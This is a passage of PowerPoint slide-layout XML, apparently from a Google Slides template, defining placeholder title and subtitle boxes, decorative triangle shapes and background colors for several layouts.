              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4841813" y="4272868"/>
            <a:ext cx="2509200" cy="5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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4852013" y="4717656"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568111" y="2339167"/>
            <a:ext cx="2500800" cy="5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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6574111" y="2752101"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8286836" y="4272868"/>
            <a:ext cx="2500800" cy="5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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8292836" y="4717656"/>
            <a:ext cx="2488800" cy="7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r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Google Shape;303;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632400" y="707633"/>
            <a:ext cx="69272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4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976358582"/>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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 304"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7855800" y="-516133"/>
            <a:ext cx="7018800" cy="35968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6" name="Google Shape;306;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6922433" y="3080667"/>
            <a:ext cx="9870800" cy="5058800"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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7" name="Google Shape;307;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149933" y="4432600"/>
            <a:ext cx="23516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308" name="Google Shape;308;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565933" y="4777615"/>
            <a:ext cx="3519600" cy="10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309" name="Google Shape;309;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8701007" y="4432600"/>
            <a:ext cx="23516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310" name="Google Shape;310;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8117001" y="4777615"/>
            <a:ext cx="3519600" cy="10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311" name="Google Shape;311;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4920200" y="4432600"/>
            <a:ext cx="23516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312" name="Google Shape;312;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336197" y="4777615"/>
            <a:ext cx="3519600" cy="10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313" name="Google Shape;313;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2250600" y="707633"/>
            <a:ext cx="76908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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="800105498"/>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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 314"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="-4226800" y="129233"/>
            <a:ext cx="14234800" cy="6410800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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6" name="Google Shape;316;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495800" y="1376300"/>
            <a:ext cx="23516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317" name="Google Shape;317;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7060800" y="1701500"/>
            <a:ext cx="3221600" cy="75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318" name="Google Shape;318;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="3039600"/>
            <a:ext cx="4438400" cy="778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4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319" name="Google Shape;319;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495800" y="3281080"/>
            <a:ext cx="23516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320" name="Google Shape;320;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7060800" y="3612629"/>
            <a:ext cx="3221600" cy="75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321" name="Google Shape;321;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495800" y="5169892"/>
            <a:ext cx="23516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322" name="Google Shape;322;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7060800" y="5501443"/>
            <a:ext cx="3221600" cy="75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323" name="Google Shape;323;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9312167" y="-819167"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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324" name="Google Shape;324;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9392167" y="-946167"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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325" name="Google Shape;325;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10617867" y="5318167"/>
            <a:ext cx="1807200" cy="17524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326" name="Google Shape;326;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9784267" y="5674667"/>
            <a:ext cx="3884400" cy="18220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621359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dos columnas " type="twoColTx">
  <p:cSld name="Título y dos columnas ">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solid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subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111903" y="3522103"/>
            <a:ext cx="4134400" cy="13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26" name="Google Shape;26;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6945697" y="3522103"/>
            <a:ext cx="4134400" cy="13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27" name="Google Shape;27;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2073303" y="2647680"/>
            <a:ext cx="22116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4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28" name="Google Shape;28;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7907097" y="2647680"/>
            <a:ext cx="22116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4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29" name="Google Shape;29;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4784600" y="-30167"/>
            <a:ext cx="2622800" cy="1181200"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000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35315916"/>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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 327"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680400" y="707633"/>
            <a:ext cx="6927200" cy="70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4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329" name="Google Shape;329;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9210567" y="-1078067"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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330" name="Google Shape;330;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9290567" y="-1205067"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1521520961"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 331"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;332;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-696633" y="4574267"/>
            <a:ext cx="3056800" cy="2778800"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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3" name="Google Shape;333;p43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189400" y="707633"/>
            <a:ext cx="98132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334" name="Google Shape;334;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9682400" y="-736700"/>
            <a:ext cx="3056800" cy="2778800"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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5" name="Google Shape;335;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-3151233" y="5987867"/>
            <a:ext cx="7153200" cy="33552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6" name="Google Shape;336;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="10612067" y="450167"/>
            <a:ext cx="3276400" cy="15368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7953321"/>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dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 337"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189400" y="707633"/>
            <a:ext cx="98132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lt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339" name="Google Shape;339;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-306367" y="-480333"/>
            <a:ext cx="3056800" cy="2778800"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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0" name="Google Shape;340;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9319867" y="4597067"/>
            <a:ext cx="7153200" cy="33552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8932357"/>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3">
  <p:cSld name="Title only 3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 341"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;342;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="707633"/>
            <a:ext cx="7695200" cy="70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4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343" name="Google Shape;343;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-3327000" y="-1180533"/>
            <a:ext cx="5757200" cy="2950800"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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81441635"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 344"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Google Shape;345;p46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="707633"/>
            <a:ext cx="9813200" cy="70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4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346" name="Google Shape;346;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2368867" y="3601567"/>
            <a:ext cx="4541200" cy="4403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347" name="Google Shape;347;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8659633" y="-1576333"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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348" name="Google Shape;348;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7272933" y="-2385767"/>
            <a:ext cx="7153200" cy="33552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57135601"/>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5">
  <p:cSld name="Title only 5">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 349"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;350;p47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189400" y="707633"/>
            <a:ext cx="98132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351" name="Google Shape;351;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-383667" y="-151700"/>
            <a:ext cx="3971600" cy="41100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2" name="Google Shape;352;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6678633" y="2249333"/>
            <a:ext cx="9870800" cy="50588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68453958"/>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6">
  <p:cSld name="Title only 6">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 353"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Google Shape;354;p48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955400" y="707633"/>
            <a:ext cx="102812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355" name="Google Shape;355;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2241867" y="3309467"/>
            <a:ext cx="4541200" cy="4403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356" name="Google Shape;356;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8659633" y="-1576333"/>
            <a:ext cx="4541200" cy="4403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357" name="Google Shape;357;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7272933" y="-2385767"/>
            <a:ext cx="7153200" cy="33552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77703073"/>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10">
  <p:cSld name="Title and text 10">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 358"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="707633"/>
            <a:ext cx="102812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360" name="Google Shape;360;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2241867" y="3309467"/>
            <a:ext cx="4541200" cy="4403200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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361" name="Google Shape;361;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8659633" y="-1576333"/>
            <a:ext cx="4541200" cy="4403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362" name="Google Shape;362;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7353633" y="-2409467"/>
            <a:ext cx="7153200" cy="33552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3" name="Google Shape;363;p49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="1898867"/>
            <a:ext cx="10281200" cy="4346400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" marR="67732" lvl="0" indent="-423323"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1219170" lvl="1" indent="-423323"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828754" lvl="2" indent="-423323"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2438339" lvl="3" indent="-423323"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3047924" lvl="4" indent="-423323"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3657509" lvl="5" indent="-423323"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4267093" lvl="6" indent="-423323"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4876678" lvl="7" indent="-423323"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5486263" lvl="8" indent="-423323" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="516863987"/>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11">
  <p:cSld name="Title and text 11">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 364"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
